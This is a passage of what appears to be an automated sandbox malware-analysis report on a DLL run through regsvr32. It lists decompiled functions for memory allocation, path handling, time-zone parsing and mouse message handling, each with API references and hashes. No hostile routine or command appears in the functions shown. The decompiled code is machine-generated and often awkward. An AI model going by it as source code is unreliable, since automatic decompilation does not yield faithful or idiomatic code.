                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocH_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3910492588-0
                                                                                                            • Opcode ID: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                                                            • Instruction ID: 4636a69bf69d573d2e706337ed3b04a464365e57385db0f45bc25e4442f629a4
                                                                                                            • Opcode Fuzzy Hash: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                                                            • Instruction Fuzzy Hash: 80018B396001A29FE72ACF18C851B6D77A2FB81362F10053EE996DB290DB349C00CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100045D0 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 287 100045d0-100045ea VirtualAlloc
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100045D0(void* _a4, long _a8, long _a12, long _a16) {
				void* _t7;

				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t7;
			}




                                                                                                            0x100045e4
                                                                                                            0x100045ea

                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(?,?,?,?), ref: 100045E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                                                            • Instruction ID: c6cc4055dfec23ff58d81a81712461c79eda0eebf3d1de213efbbce8f3264bb9
                                                                                                            • Opcode Fuzzy Hash: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                                                            • Instruction Fuzzy Hash: FCC0EAB9608201AF9A04DB54C988C6BB7E9EBC8641F008909B59983210D630E8408B22
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100045F0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 288 100045f0-10004605 VirtualFree
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100045F0(void* _a4, long _a8, long _a12) {
				int _t5;

				_t5 = VirtualFree(_a4, _a8, _a12); // executed
				return _t5;
			}




                                                                                                            0x100045ff
                                                                                                            0x10004605

                                                                                                            APIs
                                                                                                            • VirtualFree.KERNELBASE(?,?,?), ref: 100045FF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                                                            • Instruction ID: 188741ce2ee140a107eafa4ec0cdb16d021ba485332012740db5241ef1f15393
                                                                                                            • Opcode Fuzzy Hash: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                                                            • Instruction Fuzzy Hash: D3C048B9218201BFEA04DB50CA88C2BB7A9EBC8A11F00C90DB88983210C630EC00DA22
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 1002592C Relevance: 15.1, APIs: 10, Instructions: 102stringfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002592C(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t33;
				long _t35;
				intOrPtr* _t36;
				void* _t43;
				void* _t49;
				CHAR* _t69;
				void* _t74;
				void* _t76;

				E10011BF0(0x1003acd2, _t76);
				_t33 =  *0x1004c470; // 0xf3933a06
				_t69 =  *(_t76 + 8);
				 *((intOrPtr*)(_t76 - 0x10)) = _t33;
				_t35 = GetFullPathNameA( *(_t76 + 0xc), 0x104, _t69, _t76 - 0x154);
				if(_t35 != 0) {
					if(_t35 < 0x104) {
						_t36 = E100243B2();
						_t67 =  *_t36;
						 *(_t76 + 8) =  *((intOrPtr*)( *_t36 + 0xc))() + 0x10;
						 *((intOrPtr*)(_t76 - 4)) = 0;
						E100258EA(0, _t69, _t76 + 8);
						if(PathIsUNCA( *(_t76 + 8)) != 0) {
							L15:
							_t74 = 1;
						} else {
							if(GetVolumeInformationA( *(_t76 + 8), 0, 0, 0, _t76 - 0x15c, _t76 - 0x158, 0, 0) != 0) {
								if(( *(_t76 - 0x158) & 0x00000002) == 0) {
									CharUpperA(_t69);
								}
								if(( *(_t76 - 0x158) & 0x00000004) != 0) {
									goto L15;
								} else {
									_t49 = FindFirstFileA( *(_t76 + 0xc), _t76 - 0x150);
									if(_t49 == 0xffffffff) {
										goto L15;
									} else {
										FindClose(_t49);
										if( *(_t76 - 0x154) == 0 ||  *(_t76 - 0x154) <= _t69 || lstrlenA(_t76 - 0x124) - _t69 +  *(_t76 - 0x154) >= 0x104) {
											goto L6;
										} else {
											lstrcpyA( *(_t76 - 0x154), _t76 - 0x124);
											goto L15;
										}
									}
								}
							} else {
								L6:
								_t74 = 0;
							}
						}
						E100014B0( &(( *(_t76 + 8))[0xfffffffffffffff0]), _t67);
						_t43 = _t74;
					} else {
						goto L3;
					}
				} else {
					lstrcpynA(_t69,  *(_t76 + 0xc), 0x104);
					L3:
					_t43 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return E100117AE(_t43,  *((intOrPtr*)(_t76 - 0x10)));
			}











                                                                                                            0x10025931
                                                                                                            0x1002593c
                                                                                                            0x10025944
                                                                                                            0x10025947
                                                                                                            0x1002595b
                                                                                                            0x10025965
                                                                                                            0x10025976
                                                                                                            0x1002597f
                                                                                                            0x10025984
                                                                                                            0x1002598e
                                                                                                            0x10025996
                                                                                                            0x10025999
                                                                                                            0x100259a9
                                                                                                            0x10025a44
                                                                                                            0x10025a46
                                                                                                            0x100259af
                                                                                                            0x100259cd
                                                                                                            0x100259da
                                                                                                            0x100259dd
                                                                                                            0x100259dd
                                                                                                            0x100259ea
                                                                                                            0x00000000
                                                                                                            0x100259ec
                                                                                                            0x100259f6
                                                                                                            0x100259ff
                                                                                                            0x00000000
                                                                                                            0x10025a01
                                                                                                            0x10025a02
                                                                                                            0x10025a0e
                                                                                                            0x00000000
                                                                                                            0x10025a31
                                                                                                            0x10025a3e
                                                                                                            0x00000000
                                                                                                            0x10025a3e
                                                                                                            0x10025a0e
                                                                                                            0x100259ff
                                                                                                            0x100259cf
                                                                                                            0x100259cf
                                                                                                            0x100259cf
                                                                                                            0x100259cf
                                                                                                            0x100259cd
                                                                                                            0x10025a4d
                                                                                                            0x10025a52
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10025967
                                                                                                            0x1002596c
                                                                                                            0x10025978
                                                                                                            0x10025978
                                                                                                            0x10025978
                                                                                                            0x10025a59
                                                                                                            0x10025a6a

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10025931
                                                                                                            • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                                                            • lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                                                              • Part of subcall function 100258EA: lstrcpynA.KERNEL32(00000000,?,00000104), ref: 1002590F
                                                                                                              • Part of subcall function 100258EA: PathStripToRootA.SHLWAPI(00000000), ref: 10025916
                                                                                                            • PathIsUNCA.SHLWAPI(?,?,?), ref: 100259A1
                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 100259C5
                                                                                                            • CharUpperA.USER32(?), ref: 100259DD
                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 100259F6
                                                                                                            • FindClose.KERNEL32(00000000), ref: 10025A02
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10025A1F
                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 10025A3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4080879615-0
                                                                                                            • Opcode ID: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                                                            • Instruction ID: 1fd06765c8897f0dc9d05cfa7245a04573121f8266c58d07b0a106865c59afd7
                                                                                                            • Opcode Fuzzy Hash: 0ef6f2e99765fa8eebebeb34d5511f989af001345e8d2ce3599a936882c97ade
                                                                                                            • Instruction Fuzzy Hash: E531B271900168EFDB11CFA0DC88EEEBBBCEF45396F404266F406DA151D7319E848B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10018E14 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 212timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E10018E14(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t21;
				long _t22;
				char* _t24;
				signed int _t26;
				signed int _t27;
				int _t29;
				char* _t30;
				int _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				int _t36;
				int _t39;
				int _t41;
				int _t44;
				char* _t48;
				signed int _t49;
				void* _t51;
				int _t52;
				signed int _t54;
				void* _t56;
				void* _t58;
				int _t60;
				int _t63;
				void* _t75;
				void* _t76;
				void* _t77;
				signed int _t82;
				char* _t87;
				int _t89;
				void* _t90;

				_push(0x18);
				_push(0x10042cd0);
				E10012514(__ebx, __edi, __esi);
				 *(_t90 - 0x20) = 0;
				E10013A38(__ebx, 0, 7);
				 *(_t90 - 4) = 0;
				_t63 =  *0x1004f734; // 0x0
				 *(_t90 - 0x28) = _t63;
				 *0x1004f814 = 0;
				 *0x1004ce8c =  *0x1004ce8c | 0xffffffff;
				 *0x1004ce80 =  *0x1004ce80 | 0xffffffff;
				_t87 = E1001ADE6(0x10042ccc);
				 *((intOrPtr*)(_t90 - 0x24)) = _t87;
				if(_t87 == 0 ||  *_t87 == 0) {
					_t21 =  *0x1004f818; // 0x0
					__eflags = _t21;
					if(__eflags != 0) {
						_push(_t21);
						E100107C8(_t63, 0, _t87, __eflags);
						 *0x1004f818 = 0;
					}
					_t22 = GetTimeZoneInformation(0x1004f768);
					__eflags = _t22 - 0xffffffff;
					if(_t22 == 0xffffffff) {
						goto L31;
					} else {
						 *0x1004f814 = 1;
						_t26 = 0x1004f768->Bias; // 0x0
						_t27 = _t26 * 0x3c;
						 *0x1004cde8 = _t27;
						__eflags =  *0x1004f7ae; // 0x0
						if(__eflags != 0) {
							_t82 =  *0x1004f7bc; // 0x0
							_t39 = _t27 + _t82 * 0x3c;
							__eflags = _t39;
							 *0x1004cde8 = _t39;
						}
						__eflags =  *0x1004f802; // 0x0
						if(__eflags == 0) {
							L22:
							 *0x1004cdec = 0;
							 *0x1004cdf0 = 0;
							goto L23;
						} else {
							_t36 =  *0x1004f810; // 0x0
							__eflags = _t36;
							if(_t36 == 0) {
								goto L22;
							}
							 *0x1004cdec = 1;
							 *0x1004cdf0 = (_t36 -  *0x1004f7bc) * 0x3c;
							L23:
							_t29 = WideCharToMultiByte(_t63, 0, 0x1004f76c, 0xffffffff,  *0x1004ce78, 0x3f, 0, _t90 - 0x1c);
							__eflags = _t29;
							if(_t29 == 0) {
								L26:
								_t30 =  *0x1004ce78; // 0x1004cdf8
								 *_t30 = 0;
								L27:
								_t32 = WideCharToMultiByte(_t63, 0, 0x1004f7c0, 0xffffffff,  *0x1004ce7c, 0x3f, 0, _t90 - 0x1c);
								__eflags = _t32;
								if(_t32 == 0) {
									L30:
									_t33 =  *0x1004ce7c; // 0x1004ce38
									 *_t33 = 0;
									goto L31;
								}
								__eflags =  *(_t90 - 0x1c);
								if( *(_t90 - 0x1c) != 0) {
									goto L30;
								}
								_t34 =  *0x1004ce7c; // 0x1004ce38
								_t34[0x3f] = 0;
								goto L31;
							}
							__eflags =  *(_t90 - 0x1c);
							if( *(_t90 - 0x1c) != 0) {
								goto L26;
							}
							_t35 =  *0x1004ce78; // 0x1004cdf8
							_t35[0x3f] = 0;
							goto L27;
						}
					}
				} else {
					_t41 =  *0x1004f818; // 0x0
					if(_t41 == 0) {
						L6:
						_t44 = E100107B6(E10011820(_t87) + 1);
						 *0x1004f818 = _t44;
						if(_t44 == 0) {
							L31:
							_t24 = E1001095E(_t90 - 0x10, 0xffffffff);
							L47:
							return E1001254F(_t24);
						}
						E10017B90(_t44, _t87);
						_pop(_t75);
						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
						E1001902F();
						E10019E20( *0x1004ce78, _t87, 3);
						_t48 =  *0x1004ce78; // 0x1004cdf8
						_t48[3] = 0;
						_t89 = _t87 + 3;
						if( *_t89 == 0x2d) {
							 *(_t90 - 0x20) = 1;
							_t89 = _t89 + 1;
						}
						_t49 = E10012749(_t63, _t75, _t90, _t89);
						_pop(_t76);
						 *0x1004cde8 = _t49 * 0xe10;
						while(1) {
							_t51 =  *_t89;
							if(_t51 != 0x2b && (_t51 < 0x30 || _t51 > 0x39)) {
								break;
							}
							_t89 = _t89 + 1;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							L42:
							__eflags =  *(_t90 - 0x20);
							if( *(_t90 - 0x20) != 0) {
								 *0x1004cde8 =  ~( *0x1004cde8);
							}
							_t52 =  *_t89;
							 *0x1004cdec = _t52;
							__eflags = _t52;
							if(_t52 == 0) {
								_t24 =  *0x1004ce7c; // 0x1004ce38
								 *_t24 = 0;
							} else {
								E10019E20( *0x1004ce7c, _t89, 3);
								_t24 =  *0x1004ce7c; // 0x1004ce38
								_t24[3] = 0;
							}
							goto L47;
						}
						_t89 = _t89 + 1;
						_t54 = E10012749(0x30, _t76, _t90, _t89);
						_pop(_t77);
						 *0x1004cde8 =  *0x1004cde8 + _t54 * 0x3c;
						while(1) {
							_t56 =  *_t89;
							__eflags = _t56 - 0x30;
							if(_t56 < 0x30) {
								break;
							}
							__eflags = _t56 - 0x39;
							if(_t56 > 0x39) {
								break;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							goto L42;
						}
						_t89 = _t89 + 1;
						 *0x1004cde8 =  *0x1004cde8 + E10012749(0x30, _t77, _t90, _t89);
						while(1) {
							_t58 =  *_t89;
							__eflags = _t58 - 0x30;
							if(_t58 < 0x30) {
								goto L42;
							}
							__eflags = _t58 - 0x39;
							if(_t58 > 0x39) {
								goto L42;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						goto L42;
					}
					if(E10016D00(_t87, _t41) == 0) {
						goto L31;
					} else {
						_t60 =  *0x1004f818; // 0x0
						_t99 = _t60;
						if(_t60 != 0) {
							_push(_t60);
							E100107C8(_t63, 0, _t87, _t99);
						}
						goto L6;
					}
				}
			}


































                                                                                                            0x10018e14
                                                                                                            0x10018e16
                                                                                                            0x10018e1b
                                                                                                            0x10018e22
                                                                                                            0x10018e27
                                                                                                            0x10018e2d
                                                                                                            0x10018e30
                                                                                                            0x10018e36
                                                                                                            0x10018e39
                                                                                                            0x10018e3f
                                                                                                            0x10018e46
                                                                                                            0x10018e58
                                                                                                            0x10018e5a
                                                                                                            0x10018e5f
                                                                                                            0x10018f1d
                                                                                                            0x10018f22
                                                                                                            0x10018f24
                                                                                                            0x10018f26
                                                                                                            0x10018f27
                                                                                                            0x10018f2d
                                                                                                            0x10018f2d
                                                                                                            0x10018f38
                                                                                                            0x10018f3e
                                                                                                            0x10018f41
                                                                                                            0x00000000
                                                                                                            0x10018f47
                                                                                                            0x10018f4a
                                                                                                            0x10018f50
                                                                                                            0x10018f55
                                                                                                            0x10018f58
                                                                                                            0x10018f5d
                                                                                                            0x10018f64
                                                                                                            0x10018f66
                                                                                                            0x10018f6f
                                                                                                            0x10018f6f
                                                                                                            0x10018f71
                                                                                                            0x10018f71
                                                                                                            0x10018f76
                                                                                                            0x10018f7d
                                                                                                            0x10018f9e
                                                                                                            0x10018f9e
                                                                                                            0x10018fa4
                                                                                                            0x00000000
                                                                                                            0x10018f7f
                                                                                                            0x10018f7f
                                                                                                            0x10018f84
                                                                                                            0x10018f86
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018f88
                                                                                                            0x10018f97
                                                                                                            0x10018faa
                                                                                                            0x10018fc6
                                                                                                            0x10018fc8
                                                                                                            0x10018fca
                                                                                                            0x10018fdc
                                                                                                            0x10018fdc
                                                                                                            0x10018fe1
                                                                                                            0x10018fe4
                                                                                                            0x10018ffa
                                                                                                            0x10018ffc
                                                                                                            0x10018ffe
                                                                                                            0x10019010
                                                                                                            0x10019010
                                                                                                            0x10019015
                                                                                                            0x00000000
                                                                                                            0x10019015
                                                                                                            0x10019000
                                                                                                            0x10019003
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019005
                                                                                                            0x1001900a
                                                                                                            0x00000000
                                                                                                            0x1001900a
                                                                                                            0x10018fcc
                                                                                                            0x10018fcf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018fd1
                                                                                                            0x10018fd6
                                                                                                            0x00000000
                                                                                                            0x10018fd6
                                                                                                            0x10018f7d
                                                                                                            0x10018e6e
                                                                                                            0x10018e6e
                                                                                                            0x10018e75
                                                                                                            0x10018e98
                                                                                                            0x10018ea0
                                                                                                            0x10018ea7
                                                                                                            0x10018eae
                                                                                                            0x10019018
                                                                                                            0x1001901e
                                                                                                            0x100190b6
                                                                                                            0x100190bb
                                                                                                            0x100190bb
                                                                                                            0x10018eb6
                                                                                                            0x10018ebc
                                                                                                            0x10018ebd
                                                                                                            0x10018ec1
                                                                                                            0x10018ecf
                                                                                                            0x10018ed7
                                                                                                            0x10018edc
                                                                                                            0x10018ee0
                                                                                                            0x10018ee6
                                                                                                            0x10018ee8
                                                                                                            0x10018eef
                                                                                                            0x10018eef
                                                                                                            0x10018ef1
                                                                                                            0x10018ef6
                                                                                                            0x10018efd
                                                                                                            0x10018f04
                                                                                                            0x10018f04
                                                                                                            0x10018f08
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018f1a
                                                                                                            0x10018f1a
                                                                                                            0x10019038
                                                                                                            0x1001903b
                                                                                                            0x1001907b
                                                                                                            0x1001907b
                                                                                                            0x1001907e
                                                                                                            0x10019080
                                                                                                            0x10019080
                                                                                                            0x10019086
                                                                                                            0x10019089
                                                                                                            0x1001908e
                                                                                                            0x10019090
                                                                                                            0x100190ae
                                                                                                            0x100190b3
                                                                                                            0x10019092
                                                                                                            0x1001909b
                                                                                                            0x100190a3
                                                                                                            0x100190a8
                                                                                                            0x100190a8
                                                                                                            0x00000000
                                                                                                            0x10019090
                                                                                                            0x1001903d
                                                                                                            0x1001903f
                                                                                                            0x10019044
                                                                                                            0x10019048
                                                                                                            0x10019055
                                                                                                            0x10019055
                                                                                                            0x10019057
                                                                                                            0x10019059
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019050
                                                                                                            0x10019052
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019054
                                                                                                            0x10019054
                                                                                                            0x10019054
                                                                                                            0x1001905b
                                                                                                            0x1001905e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019060
                                                                                                            0x10019068
                                                                                                            0x10019075
                                                                                                            0x10019075
                                                                                                            0x10019077
                                                                                                            0x10019079
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019070
                                                                                                            0x10019072
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019074
                                                                                                            0x10019074
                                                                                                            0x10019074
                                                                                                            0x00000000
                                                                                                            0x10019075
                                                                                                            0x10018e82
                                                                                                            0x00000000
                                                                                                            0x10018e88
                                                                                                            0x10018e88
                                                                                                            0x10018e8d
                                                                                                            0x10018e8f
                                                                                                            0x10018e91
                                                                                                            0x10018e92
                                                                                                            0x10018e97
                                                                                                            0x00000000
                                                                                                            0x10018e8f
                                                                                                            0x10018e82

                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 10018E27
                                                                                                              • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                                                            • _strlen.LIBCMT ref: 10018E99
                                                                                                            • _strncpy.LIBCMT ref: 10018ECF
                                                                                                              • Part of subcall function 100107C8: __lock.LIBCMT ref: 100107E6
                                                                                                              • Part of subcall function 100107C8: RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                                                            • GetTimeZoneInformation.KERNEL32(1004F768,10042CD0,00000018,10019429,10042CE0,00000008,10013474,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 10018F38
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F76C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FC6
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,1004F7C0,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10018FFA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strlen_strncpy
                                                                                                            • String ID: @hvpYv
                                                                                                            • API String ID: 634650903-2766943729
                                                                                                            • Opcode ID: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                                                            • Instruction ID: 7381ce5ac415a33791fc082bffc14b542c5be3190c63e6ff879a0c337f862410
                                                                                                            • Opcode Fuzzy Hash: a9bae9aefb51bf9dcb25716141066ca3c4119656b85ae577e9b21111d529fdd4
                                                                                                            • Instruction Fuzzy Hash: F871F6308046659EF751CB299E85E593FE9EB4B360F20422EE490DF2E1D770DAC2CB59
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002FE1B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 164keyboardtimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 81%
                                                                                                            			E1002FE1B(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				struct tagPOINT _v28;
				intOrPtr _v40;
				signed char _v69;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t62;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t77;
				short _t78;
				short _t85;
				short _t90;
				intOrPtr _t109;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr* _t116;

				_t113 = _a4;
				_t116 = __ecx;
				if(E10020B0B(__ecx, _t113) != 0) {
					L37:
					return 1;
				}
				_t114 =  *((intOrPtr*)(_t113 + 4));
				_v20 = E10008325(__ecx);
				if(( *(__ecx + 0x7c) & 0x00000020) != 0 || _t114 == 0x201 || _t114 == 0x202) {
					if(_t114 < 0x200 || _t114 > 0x209) {
						if(_t114 < 0xa0 || _t114 > 0xa9) {
							goto L30;
						} else {
							goto L8;
						}
					} else {
						L8:
						_v16 = E100373DB();
						_t70 = _a4;
						_v28.y =  *((intOrPtr*)(_t70 + 0x18));
						_v28.x =  *(_t70 + 0x14);
						ScreenToClient( *(_t116 + 0x1c),  &_v28);
						E10011C50( &_v76, 0, 0x30);
						_v76 = 0x28;
						_t77 =  *((intOrPtr*)( *_t116 + 0x6c))(_v28.x, _v28.y,  &_v76);
						_t128 = _v40 - 0xffffffff;
						_v8 = _t77;
						if(_v40 != 0xffffffff) {
							_push(_v40);
							E100107C8(0x201, _t114, _t116, _t128);
						}
						if(_t114 != 0x201 || (_v69 & 0x00000080) == 0) {
							_v12 = _v12 & 0x00000000;
							__eflags = _t114 - 0x201;
							if(_t114 != 0x201) {
								_t90 = GetKeyState(1);
								__eflags = _t90;
								if(_t90 < 0) {
									_v8 =  *((intOrPtr*)(_v16 + 0x78));
								}
							}
						} else {
							_v12 = 1;
						}
						if(_v8 < 0 || _v12 != 0) {
							_t78 = GetKeyState(1);
							__eflags = _t78;
							if(_t78 >= 0) {
								L28:
								 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
								KillTimer( *(_t116 + 0x1c), 0xe001);
								goto L29;
							}
							__eflags = _v12;
							if(_v12 == 0) {
								goto L29;
							}
							goto L28;
						} else {
							if(_t114 != 0x202) {
								__eflags =  *(_t116 + 0x78) & 0x00000008;
								if(( *(_t116 + 0x78) & 0x00000008) != 0) {
									L25:
									 *((intOrPtr*)( *_t116 + 0x160))(_v8);
									L29:
									 *((intOrPtr*)(_v16 + 0x78)) = _v8;
									goto L30;
								}
								_t85 = GetKeyState(1);
								__eflags = _t85;
								if(_t85 < 0) {
									goto L25;
								}
								_t109 = _v16;
								__eflags = _v8 -  *((intOrPtr*)(_t109 + 0x78));
								if(_v8 ==  *((intOrPtr*)(_t109 + 0x78))) {
									goto L29;
								}
								_push(0x12c);
								_push(0xe000);
								L24:
								E1002F4CC(_t116);
								goto L29;
							}
							 *((intOrPtr*)( *_t116 + 0x160))(0xffffffff);
							_push(0xc8);
							_push(0xe001);
							goto L24;
						}
					}
				} else {
					L30:
					_t62 = E10022AD5(_t116);
					if(_t62 == 0 ||  *((intOrPtr*)(_t62 + 0x64)) == 0) {
						if(_v20 == 0) {
							L35:
							if(IsWindow( *(_t116 + 0x1c)) == 0) {
								goto L38;
							}
							return E10021527(_a4);
						} else {
							goto L33;
						}
						while(1) {
							L33:
							_t115 = _v20;
							_push(_a4);
